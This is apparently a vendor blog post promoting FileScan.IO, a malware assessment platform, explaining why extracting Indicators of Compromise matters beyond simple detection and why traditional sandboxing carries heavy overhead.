Let's start out by describing the problem, followed by our solution.
We need more than detection
We all know that fast and effective response within the incident response cycle is key. Yes, speed matters, but so does diligence and depth of analysis. Today, dealing with malware is more than the binary question of detecting if a file is good/bad. First of all, there are many shades of grey. Secondly, having full understanding of the impact of a potential threat (why is it bad? what capabilities are present? what underlying network infrastructure is being used?) is vital to a full IT security workflow. At the very minimum, an analysis system needs to be able to extract embedded Indicators of Compromise ("IOCs") for pre-emptive measures and to detect e.g. a potential breach. Thus far, mostly due to heavy obfuscation and encryption, only actual execution of malware (typically within an isolated environment, also known as dynamic analysis) has been able to extract needed key IOCs (e.g. network IPs, URLs, Domains) on a consistent basis. However, standing up a scalable array of virtual machines in order to scan every file comes with a lot of overhead. For example, maintaining an array of VM image snapshots, security updates, filtering out white noise, hardware requirements, limited throughput, etc.
Why are IOCs important?
As mentioned, purely detecting malware is not enough. Only by uncovering potential IOCs often hidden behind many layers of obfuscation (e.g. an obfuscated VBA macro calling powershell, which eventually downloads a file), it becomes possible to perform better attribution and understanding of the nature of an attack. Furthermore, IOCs lead to detecting other potentially compromised endpoints and allows preemptive protection of assets e.g. by blocking the underlying network IPs/Domains in your firewall (thereby avoiding data corruption and exfiltration).
Is traditional sandboxing the golden bullet?
IOC Extraction Today
However, for a low volume of files (and forensic purposes alike), traditional sandboxing becomes a useful add-on in a pipelined approach. So how do we reduce the total input? Using white-/blacklists helps, but only so much, as they are often based on the file hash and a trailing indicator. Modern malware campaigns are performed with thousands of automatically generated malware samples that are fresh and unknown.
Rapid IOC Feedback Loop
FileScan.IO is a next-gen malware assessment platform with the following emphasis:
- Providing rapid and in-depth threat analysis services capable of massive processing
- Focus on Indicator-of-Compromise (IOC) extraction and actionable context
- Cloud-native analysis in AWS (optional)
Want more information?